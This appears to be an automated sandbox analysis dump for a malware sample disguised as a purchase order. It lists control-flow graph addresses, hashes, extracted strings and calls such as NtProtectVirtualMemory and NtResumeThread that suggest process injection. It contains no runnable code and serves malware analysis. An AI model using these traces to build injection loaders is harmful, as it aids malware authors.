                                                          • Opcode ID: 18f5687e28659200681dba21703b1d4c20f590f47413c190be5981d5c6f4e65f
                                                          • Instruction ID: 4192cbdd4357fc9adef26786e2eddce3fce99bc7b34e97a812ad15a66388f778
                                                          • Opcode Fuzzy Hash: 18f5687e28659200681dba21703b1d4c20f590f47413c190be5981d5c6f4e65f
                                                          • Instruction Fuzzy Hash: 6922FB74A00218CFDB18DF64C894BA9B7B2FF88714F1481D9E909AB295DB71ED85CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 636 d4d468-d4d489 637 d4d490-d4d577 636->637 638 d4d48b 636->638 640 d4d57d-d4d6be call d498f8 637->640 641 d4dc79-d4dca1 637->641 638->637 687 d4d6c4-d4d71f 640->687 688 d4dc42-d4dc6c 640->688 644 d4e3a7-d4e3b0 641->644 646 d4e3b6-d4e3cd 644->646 647 d4dcaf-d4dcb9 644->647 648 d4dcc0-d4ddb4 call d498f8 647->648 649 d4dcbb 647->649 670 d4ddb6-d4ddc2 648->670 671 d4ddde 648->671 649->648 673 d4ddc4-d4ddca 670->673 674 d4ddcc-d4ddd2 670->674 672 d4dde4-d4de04 671->672 678 d4de64-d4dee4 672->678 679 d4de06-d4de5f 672->679 676 d4dddc 673->676 674->676 676->672 699 d4dee6-d4df39 678->699 700 d4df3b-d4df7e call d498f8 678->700 691 d4e3a4 679->691 694 d4d724-d4d72f 687->694 695 d4d721 687->695 701 d4dc76 688->701 702 d4dc6e 688->702 691->644 698 d4db57-d4db5d 694->698 695->694 703 d4d734-d4d752 698->703 704 d4db63-d4dbdf call d49938 698->704 725 d4df89-d4df92 699->725 700->725 701->641 702->701 706 d4d754-d4d758 703->706 707 d4d7a9-d4d7be 703->707 744 d4dc2c-d4dc32 704->744 706->707 710 d4d75a-d4d765 706->710 712 d4d7c5-d4d7db 707->712 713 d4d7c0 707->713 716 d4d79b-d4d7a1 710->716 714 d4d7e2-d4d7f9 712->714 715 d4d7dd 712->715 713->712 720 d4d800-d4d816 714->720 721 d4d7fb 714->721 715->714 722 d4d767-d4d76b 716->722 723 d4d7a3-d4d7a4 716->723 728 d4d81d-d4d824 720->728 729 d4d818 720->729 721->720 726 d4d771-d4d789 722->726 727 d4d76d 722->727 731 d4d827-d4d892 723->731 732 d4dff2-d4e001 725->732 733 d4d790-d4d798 726->733 734 d4d78b 726->734 727->726 728->731 729->728 735 d4d894-d4d8a0 731->735 736 d4d8a6-d4da5b 731->736 738 d4df94-d4dfbc 732->738 739 d4e003-d4e08b 732->739 733->716 734->733 735->736 746 d4da5d-d4da61 736->746 747 d4dabf-d4dad4 736->747 741 d4dfc3-d4dfec 738->741 742 d4dfbe 738->742 774 d4e204-d4e210 739->774 741->732 742->741 750 d4dc34-d4dc3a 744->750 751 d4dbe1-d4dc29 744->751 746->747 748 d4da63-d4da72 746->748 752 d4dad6 747->752 753 d4dadb-d4dafc 747->753 754 d4dab1-d4dab7 748->754 750->688 751->744 752->753 755 d4db03-d4db22 753->755 756 d4dafe 753->756 761 d4da74-d4da78 754->761 762 d4dab9-d4daba 754->762 758 d4db24 755->758 759 d4db29-d4db49 755->759 756->755 758->759 767 d4db50 759->767 768 d4db4b 759->768 765 d4da82-d4daa3 761->765 766 d4da7a-d4da7e 761->766 769 d4db54 762->769 770 d4daa5 765->770 771 d4daaa-d4daae 765->771 766->765 767->769 768->767 769->698 770->771 771->754 776 d4e216-d4e271 774->776 777 d4e090-d4e099 774->777 792 d4e273-d4e2a6 776->792 793 d4e2a8-d4e2d2 776->793 778 d4e0a2-d4e1f8 777->778 779 d4e09b 777->779 797 d4e1fe 778->797 779->778 781 d4e177-d4e1b7 779->781 782 d4e132-d4e172 779->782 783 d4e0ed-d4e12d 779->783 784 d4e0a8-d4e0e8 779->784 781->797 782->797 783->797 784->797 801 d4e2db-d4e36e 792->801 793->801 797->774 805 d4e375-d4e395 801->805 805->691
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJcq$Te^q$pbq$xbaq
                                                          • API String ID: 0-1954897716
                                                          • Opcode ID: cd465836d443bf360e9c398bd60cc992ee8737fe7cf1280ef1e76ab0864e779e
                                                          • Instruction ID: 55a6ab6d29a9222f4ea0e726a569696f141b33422bef031d7aab6e3e017bb718
                                                          • Opcode Fuzzy Hash: cd465836d443bf360e9c398bd60cc992ee8737fe7cf1280ef1e76ab0864e779e
                                                          • Instruction Fuzzy Hash: 3CA2B675A00228DFDB64CF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1037 5b58848-5b58873 1038 5b58875 1037->1038 1039 5b5887a-5b588cc 1037->1039 1038->1039 1042 5b588cf-5b588d5 1039->1042 1043 5b588d7-5b58ec4 1042->1043 1044 5b588de-5b5890d 1042->1044 1050 5b58eca-5b58ef3 1043->1050 1048 5b5891f-5b58925 1044->1048 1049 5b5890f-5b58917 1044->1049 1051 5b58927 1048->1051 1052 5b5892e-5b5892f 1048->1052 1049->1048 1050->1042 1053 5b58ef9-5b58eff 1050->1053 1051->1052 1054 5b58934-5b589ac call 5b581f8 1051->1054 1055 5b58b04-5b58b49 1051->1055 1056 5b58c34-5b58c6a 1051->1056 1057 5b58c74-5b58c91 1051->1057 1058 5b589f3-5b58a6c call 5b581f8 1051->1058 1059 5b58cb2-5b58cd2 1051->1059 1060 5b58cdc 1051->1060 1061 5b589bf-5b589ee 1051->1061 1062 5b58a7f-5b58af3 1051->1062 1063 5b58caf-5b58cb0 1051->1063 1064 5b58c08-5b58c2a 1051->1064 1052->1061 1053->1042 1054->1048 1123 5b589b2-5b589ba 1054->1123 1110 5b58b53-5b58b58 1055->1110 1111 5b58b4b-5b58b51 1055->1111 1065 5b58bf6-5b58bfc 1056->1065 1082 5b58c6c-5b58c72 1056->1082 1057->1059 1075 5b58c93-5b58c9b 1057->1075 1058->1048 1126 5b58a72-5b58a7a 1058->1126 1085 5b58c9d-5b58ca3 1059->1085 1094 5b58cd4-5b58cda 1059->1094 1067 5b58cdd 1060->1067 1061->1048 1062->1048 1127 5b58af9-5b58aff 1062->1127 1063->1067 1064->1065 1066 5b58c2c-5b58c32 1064->1066 1078 5b58c05-5b58c06 1065->1078 1079 5b58bfe 1065->1079 1066->1065 1071 5b58d32-5b58d3b 1067->1071 1083 5b58d44-5b58d45 1071->1083 1084 5b58d3d 1071->1084 1075->1085 1078->1064 1079->1056 1079->1057 1079->1059 1079->1060 1079->1063 1079->1064 1079->1078 1086 5b58eb6-5b58eb7 1079->1086 1087 5b58e7b-5b58ea9 1079->1087 1088 5b58d47-5b58d48 1079->1088 1089 5b58d63 1079->1089 1090 5b58e0c 1079->1090 1091 5b58dce-5b58dfa 1079->1091 1092 5b58e09-5b58e0a 1079->1092 1093 5b58d4a-5b58d61 1079->1093 1082->1065 1083->1088 1084->1086 1084->1087 1084->1088 1084->1089 1084->1090 1084->1091 1084->1092 1084->1093 1101 5b58ca5 1085->1101 1102 5b58cac-5b58cad 1085->1102 1119 5b58eb8 1086->1119 1116 5b58e66-5b58e6f 1087->1116 1118 5b58eab-5b58eb4 1087->1118 1097 5b58d64 1088->1097 1089->1097 1095 5b58e0d 1090->1095 1108 5b58db9-5b58dc2 1091->1108 1115 5b58dfc-5b58e07 1091->1115 1092->1095 1093->1071 1094->1085 1095->1116 1097->1108 1101->1059 1101->1060 1101->1063 1101->1086 1101->1087 1101->1088 1101->1089 1101->1090 1101->1091 1101->1092 1101->1093 1101->1102 1102->1060 1112 5b58dc4 1108->1112 1113 5b58dcb-5b58dcc 1108->1113 1121 5b58b5d-5b58bab 1110->1121 1122 5b58b5a-5b58b5b 1110->1122 1111->1110 1112->1086 1112->1087 1112->1090 1112->1091 1112->1092 1113->1091 1113->1092 1115->1108 1124 5b58e71 1116->1124 1125 5b58e78-5b58e79 1116->1125 1118->1116 1119->1119 1130 5b58bb5-5b58bba 1121->1130 1131 5b58bad-5b58bb3 1121->1131 1122->1121 1123->1048 1124->1086 1124->1087 1125->1087 1126->1048 1127->1048 1132 5b58bbc-5b58bbd 1130->1132 1133 5b58bbf-5b58bcd call 5b59161 1130->1133 1131->1130 1132->1133 1134 5b58bd3-5b58bea 1133->1134 1134->1065 1135 5b58bec-5b58bf4 1134->1135 1135->1065
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2y$Te^q$Te^q
                                                          • API String ID: 0-969158955
                                                          • Opcode ID: ea7f872773a805b62f159305ab1deaf38b7119303f4a57c7ab0d04ffb8c85d61
                                                          • Instruction ID: 49ceb6cbfca235fa782014107979e81b39fa187c57792087ecf5ba3746a6d695
                                                          • Opcode Fuzzy Hash: ea7f872773a805b62f159305ab1deaf38b7119303f4a57c7ab0d04ffb8c85d61
                                                          • Instruction Fuzzy Hash: 44F1F970E45258CFDB28CF69C894BADBBF2FB49310F2095E9E809A7255DB746981CF00

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1498 5b41e50-5b41e71 1499 5b41e73 1498->1499 1500 5b41e78-5b41f10 call 5b42788 1498->1500 1499->1500 1504 5b41f16-5b41f4d 1500->1504 1506 5b41f5c 1504->1506 1507 5b41f4f-5b41f5a 1504->1507 1508 5b41f66-5b42038 1506->1508 1507->1508 1517 5b4204a-5b42075 1508->1517 1518 5b4203a-5b42040 1508->1518 1519 5b426eb-5b42707 1517->1519 1518->1517 1520 5b4270d-5b42728 1519->1520 1521 5b4207a-5b421a3 1519->1521 1530 5b421b5-5b4230d 1521->1530 1531 5b421a5-5b421ab 1521->1531 1539 5b42366-5b4236d 1530->1539 1540 5b4230f-5b42313 1530->1540 1531->1530 1541 5b42518-5b42534 1539->1541 1542 5b42315-5b42316 1540->1542 1543 5b4231b-5b42361 1540->1543 1544 5b42372-5b42460 1541->1544 1545 5b4253a-5b4255e 1541->1545 1546 5b425a8-5b425f7 1542->1546 1543->1546 1570 5b42514-5b42515 1544->1570 1571 5b42466-5b42511 1544->1571 1552 5b425a5-5b425a6 1545->1552 1553 5b42560-5b425a2 1545->1553 1560 5b42609-5b42654 1546->1560 1561 5b425f9-5b425ff 1546->1561 1552->1546 1553->1552 1563 5b42656-5b426cc 1560->1563 1564 5b426cd-5b426e8 1560->1564 1561->1560 1563->1564 1564->1519 1570->1541 1571->1570
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fcq$8
                                                          • API String ID: 0-89531850
                                                          • Opcode ID: 05381b4a6cfa6966f0d33ec9b70397acb50454e9b2fc5ad5ff5ee3f4f635f87a
                                                          • Instruction ID: 14ce06e36a1a252d4a90add6bbeabdf51c6bf976dfc4d9dc74b2172d2e848f11
                                                          • Opcode Fuzzy Hash: 05381b4a6cfa6966f0d33ec9b70397acb50454e9b2fc5ad5ff5ee3f4f635f87a
                                                          • Instruction Fuzzy Hash: B342B475D006298BDB64DF69C850AD9B7B2FF89300F1486EAD40DA7251EB30AE85CF90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2040 5b41d75-5b41e71 2055 5b41e73 2040->2055 2056 5b41e78-5b41f10 call 5b42788 2040->2056 2055->2056 2060 5b41f16-5b41f4d 2056->2060 2062 5b41f5c 2060->2062 2063 5b41f4f-5b41f5a 2060->2063 2064 5b41f66-5b42038 2062->2064 2063->2064 2073 5b4204a-5b42075 2064->2073 2074 5b4203a-5b42040 2064->2074 2075 5b426eb-5b42707 2073->2075 2074->2073 2076 5b4270d-5b42728 2075->2076 2077 5b4207a-5b421a3 2075->2077 2086 5b421b5-5b4230d 2077->2086 2087 5b421a5-5b421ab 2077->2087 2095 5b42366-5b4236d 2086->2095 2096 5b4230f-5b42313 2086->2096 2087->2086 2097 5b42518-5b42534 2095->2097 2098 5b42315-5b42316 2096->2098 2099 5b4231b-5b42361 2096->2099 2100 5b42372-5b42460 2097->2100 2101 5b4253a-5b4255e 2097->2101 2102 5b425a8-5b425f7 2098->2102 2099->2102 2126 5b42514-5b42515 2100->2126 2127 5b42466-5b42511 2100->2127 2108 5b425a5-5b425a6 2101->2108 2109 5b42560-5b425a2 2101->2109 2116 5b42609-5b42654 2102->2116 2117 5b425f9-5b425ff 2102->2117 2108->2102 2109->2108 2119 5b42656-5b426cc 2116->2119 2120 5b426cd-5b426e8 2116->2120 2117->2116 2119->2120 2120->2075 2126->2097 2127->2126
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fcq$h
                                                          • API String ID: 0-1849521214
                                                          • Opcode ID: e87247bb739cb4bfc9c4154323cdaf6e1feff71e65f316196b516374600f6551
                                                          • Instruction ID: 94e04833a794a969ad00b519376214b18b03e6df979298e05d2e6813cb251d00
                                                          • Opcode Fuzzy Hash: e87247bb739cb4bfc9c4154323cdaf6e1feff71e65f316196b516374600f6551
                                                          • Instruction Fuzzy Hash: D1915B71D056698FDB15DF69CCA07C9BBB2EF89300F04C1EAC44DAB252DA305A89CF95

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2230 59e0040-59e006e 2231 59e0075-59e0181 2230->2231 2232 59e0070 2230->2232 2235 59e01a5-59e01b1 2231->2235 2236 59e0183-59e019f call 59e2251 2231->2236 2232->2231 2237 59e01b8-59e01bd 2235->2237 2238 59e01b3 2235->2238 2236->2235 2240 59e01bf-59e01cb 2237->2240 2241 59e01f5-59e0215 2237->2241 2238->2237 2242 59e01cd 2240->2242 2243 59e01d2-59e01f0 2240->2243 2246 59e021c-59e0241 2241->2246 2247 59e0217 2241->2247 2242->2243 2245 59e1419-59e141f 2243->2245 2248 59e1429 2245->2248 2249 59e1421 2245->2249 2253 59e024d-59e0445 2246->2253 2247->2246 2250 59e142a 2248->2250 2249->2248 2250->2250 2270 59e0ab2-59e0abe 2253->2270 2271 59e044a-59e0456 2270->2271 2272 59e0ac4-59e0afc 2270->2272 2273 59e045d-59e051a 2271->2273 2274 59e0458 2271->2274 2280 59e0bd6-59e0bdc 2272->2280 2291 59e051c-59e0535 2273->2291 2292 59e053b-59e058d 2273->2292 2274->2273 2282 59e0be2-59e0c1a 2280->2282 2283 59e0b01-59e0b7e 2280->2283 2295 59e0f64-59e0f6a 2282->2295 2301 59e0b80-59e0b84 2283->2301 2302 59e0bb1-59e0bd3 2283->2302 2291->2292 2314 59e058f-59e0597 2292->2314 2315 59e059c-59e05e9 2292->2315 2297 59e0c1f-59e0e21 2295->2297 2298 59e0f70-59e0fb8 2295->2298 2394 59e0eac-59e0eb0 2297->2394 2395 59e0e27-59e0ea7 2297->2395 2308 59e0fba-59e102d 2298->2308 2309 59e1033-59e107e 2298->2309 2301->2302 2303 59e0b86-59e0bae 2301->2303 2302->2280 2303->2302 2308->2309 2332 59e13e3-59e13e9 2309->2332 2317 59e0aa3-59e0aaf 2314->2317 2329 59e05eb-59e05f3 2315->2329 2330 59e05f8-59e0645 2315->2330 2317->2270 2329->2317 2346 59e0647-59e064f 2330->2346 2347 59e0654-59e06a1 2330->2347 2334 59e13ef-59e1417 2332->2334 2335 59e1083-59e10dc 2332->2335 2334->2245 2349 59e10de-59e10f9 2335->2349 2350 59e1104-59e1110 2335->2350 2346->2317 2374 59e06a3-59e06ab 2347->2374 2375 59e06b0-59e06fd 2347->2375 2349->2350 2351 59e1117-59e1123 2350->2351 2352 59e1112 2350->2352 2356 59e1136-59e1145 2351->2356 2357 59e1125-59e1131 2351->2357 2352->2351 2360 59e114e-59e13ab 2356->2360 2361 59e1147 2356->2361 2359 59e13ca-59e13e0 2357->2359 2359->2332 2389 59e13b6-59e13c2 2360->2389 2361->2360 2365 59e125b-59e129b 2361->2365 2366 59e1216-59e1256 2361->2366 2367 59e1154-59e11bd 2361->2367 2368 59e11c2-59e1211 2361->2368 2369 59e12a0-59e1308 2361->2369 2365->2389 2366->2389 2367->2389 2368->2389 2396 59e137c-59e1382 2369->2396 2374->2317 2402 59e06ff-59e0707 2375->2402 2403 59e070c-59e0759 2375->2403 2389->2359 2397 59e0f0d-59e0f4a 2394->2397 2398 59e0eb2-59e0f0b 2394->2398 2413 59e0f4b-59e0f61 2395->2413 2399 59e130a-59e1368 2396->2399 2400 59e1384-59e138e 2396->2400 2397->2413 2398->2413 2415 59e136f-59e1379 2399->2415 2416 59e136a 2399->2416 2400->2389 2402->2317 2421 59e075b-59e0763 2403->2421 2422 59e0768-59e07b5 2403->2422 2413->2295 2415->2396 2416->2415 2421->2317 2426 59e07b7-59e07bf 2422->2426 2427 59e07c4-59e0811 2422->2427 2426->2317 2431 59e0813-59e081b 2427->2431 2432 59e0820-59e086d 2427->2432 2431->2317 2436 59e086f-59e0877 2432->2436 2437 59e087c-59e08c9 2432->2437 2436->2317 2441 59e08cb-59e08d3 2437->2441 2442 59e08d8-59e0925 2437->2442 2441->2317 2446 59e0927-59e092f 2442->2446 2447 59e0934-59e0981 2442->2447 2446->2317 2451 59e0983-59e098b 2447->2451 2452 59e0990-59e09dd 2447->2452 2451->2317 2456 59e09df-59e09e7 2452->2456 2457 59e09ec-59e0a39 2452->2457 2456->2317 2461 59e0a3b-59e0a43 2457->2461 2462 59e0a45-59e0a92 2457->2462 2461->2317 2466 59e0a9e-59e0aa0 2462->2466 2467 59e0a94-59e0a9c 2462->2467 2466->2317 2467->2317
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2
                                                          • API String ID: 0-450215437
                                                          • Opcode ID: c7d45bd4806f6609cbc568e81556bcdf1935a7a9a67e1844bf8b9cdf90f8eb5b
                                                          • Instruction ID: 9792572bbd258eec18fa14205848c4fb93dd8eeff850667ed2022b0dd1e2c177
                                                          • Opcode Fuzzy Hash: c7d45bd4806f6609cbc568e81556bcdf1935a7a9a67e1844bf8b9cdf90f8eb5b
                                                          • Instruction Fuzzy Hash: BAC2B1B4E012288FDB65DF69C984BD9BBB6FB88300F1081E9D509AB355DB709E85CF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq
                                                          • API String ID: 0-149360118
                                                          • Opcode ID: fc7c29f124dd73d876870aed790faa4e15b078e58e12ad2e881f2f9b055e4f21
                                                          • Instruction ID: 366a31fbe2fd9e2e77e5df5b52d311aace7099be96da6dceec7edf54e63ea668
                                                          • Opcode Fuzzy Hash: fc7c29f124dd73d876870aed790faa4e15b078e58e12ad2e881f2f9b055e4f21
                                                          • Instruction Fuzzy Hash: 6E325A75B006158FCB18DFA9C495A6EBBF2FF88300F24896DE55AD7381CB34A901CB91
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B44CD5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 865a22b6aff82959764f061ae66d9c04c5499ac8955355578c8798b2a7a56b86
                                                          • Instruction ID: e6c71c9c68ebd6bc837e18878558d2f553f9ad05a3579c1d9abcd610f2e621e2
                                                          • Opcode Fuzzy Hash: 865a22b6aff82959764f061ae66d9c04c5499ac8955355578c8798b2a7a56b86
                                                          • Instruction Fuzzy Hash: D24188B5D002589FCF10CFAAD980ADEFBB5FB49310F14A42AE819B7200D735A951DF58
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05B44CD5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 4e71955061e0df9b90501e21b22ec4a75580fbfb1382a1d57abbb501ea65e356
                                                          • Instruction ID: 520785909837170865c6e57fdf7bda9d218832fbea7738c29c256f5a22dbfb0b
                                                          • Opcode Fuzzy Hash: 4e71955061e0df9b90501e21b22ec4a75580fbfb1382a1d57abbb501ea65e356
                                                          • Instruction Fuzzy Hash: 8D41A8B9D00218DFCF10CFAAD981ADEFBB1BB09310F14A42AE818B7200C735A951CF58
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 05B465EE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 605ef968fb5e9bbfc5b492ac6200da6628bcf53c27a852e7790c3b587c477111
                                                          • Instruction ID: de87cdf2ce2e71aec71dc2274867a9c4e4a6e09299b8392bb42b08e4a82a6b31
                                                          • Opcode Fuzzy Hash: 605ef968fb5e9bbfc5b492ac6200da6628bcf53c27a852e7790c3b587c477111
                                                          • Instruction Fuzzy Hash: E531B7B5D012189FCB10CFAAD980AEEFBF5BB49310F24942AE819B7300D775A941CF94
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 05B465EE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 872f5c2ef39ca2b26427bc2fbe99e702c50bee12a4e74470c30221ea12d4ce1e
                                                          • Instruction ID: 98bb376da35393d801af3d0974a12de225abf314a50291caf603e746f838d0c4
                                                          • Opcode Fuzzy Hash: 872f5c2ef39ca2b26427bc2fbe99e702c50bee12a4e74470c30221ea12d4ce1e
                                                          • Instruction Fuzzy Hash: 9931A8B5D012189FCB10CFAAD980ADEFBF5BB49310F20942AE819B7300C775A945CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Deq
                                                          • API String ID: 0-948982800
                                                          • Opcode ID: 9a0e6b0b8decb7e38ac9139726232ab3471e58f3cc53932103ba273197c6e0b8
                                                          • Instruction ID: 83ad30e117885850ab9fafb3cb32ddeadfe4aa54ad9ce65bb7988201b6811912
                                                          • Opcode Fuzzy Hash: 9a0e6b0b8decb7e38ac9139726232ab3471e58f3cc53932103ba273197c6e0b8
                                                          • Instruction Fuzzy Hash: 07D1C574E00218CFDB58DF69D990A9DBBB2FF88304F1080A9E409AB365DB759D81CF51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH^q
                                                          • API String ID: 0-2549759414
                                                          • Opcode ID: 8c53ab032ad20f6e0c9154f32ea4b75944bafa87cd1c25bb23883b9c8c43acd3
                                                          • Instruction ID: c19f0efb446533dbb156ff2b5d08aa80cabbd32217bc8c61133d81f8bbd05a98
                                                          • Opcode Fuzzy Hash: 8c53ab032ad20f6e0c9154f32ea4b75944bafa87cd1c25bb23883b9c8c43acd3
                                                          • Instruction Fuzzy Hash: E0C1E370E09398CFDB24CFA9D984BADBBF2FB89304F1094A9D409A7255DB745985CF02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          • Opcode ID: 1df56c72eda21321f29d4b7717dfb1da7cb2c7c32d1a08245185dc4fdd56a204
                                                          • Instruction ID: 10e2ab512e3058f98730ce6e65876cadcc76a3434bd0f9f4ec0a92ac27f8bb4e
                                                          • Opcode Fuzzy Hash: 1df56c72eda21321f29d4b7717dfb1da7cb2c7c32d1a08245185dc4fdd56a204
                                                          • Instruction Fuzzy Hash: E4B10974E00248CFDB18DFA9D884BADBBF2FB89310F14D1AAD919A7255DB746985CF00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH^q
                                                          • API String ID: 0-2549759414
                                                          • Opcode ID: a962207045dbf2bbfb4fad3ae0802d705fe4b861a0653cfd47dd762ab3e49e0b
                                                          • Instruction ID: e71ce2a9d87df58e55fba29a7a6fd70be7ad2405cf64789d9a27f55b8aef6a27
                                                          • Opcode Fuzzy Hash: a962207045dbf2bbfb4fad3ae0802d705fe4b861a0653cfd47dd762ab3e49e0b
                                                          • Instruction Fuzzy Hash: 94B1F370D05398CFDB24CFA9D984BADBBF2FB89304F1094AAD409AB255DB745985CF02
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          • Opcode ID: 46262b1b0d60cdfda9fe08e199bddcaf13e9a6261fd8cd8baaf462bf005ed7e0
                                                          • Instruction ID: 35bab22394e600ac7a1c528f22de87499efc9cd7bbec688b4b90d59c308994a3
                                                          • Opcode Fuzzy Hash: 46262b1b0d60cdfda9fe08e199bddcaf13e9a6261fd8cd8baaf462bf005ed7e0
                                                          • Instruction Fuzzy Hash: C9B1E270E04358CFDB19DFA9D884BADBBF6BB89304F10A069D819AB351DB749985CF01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
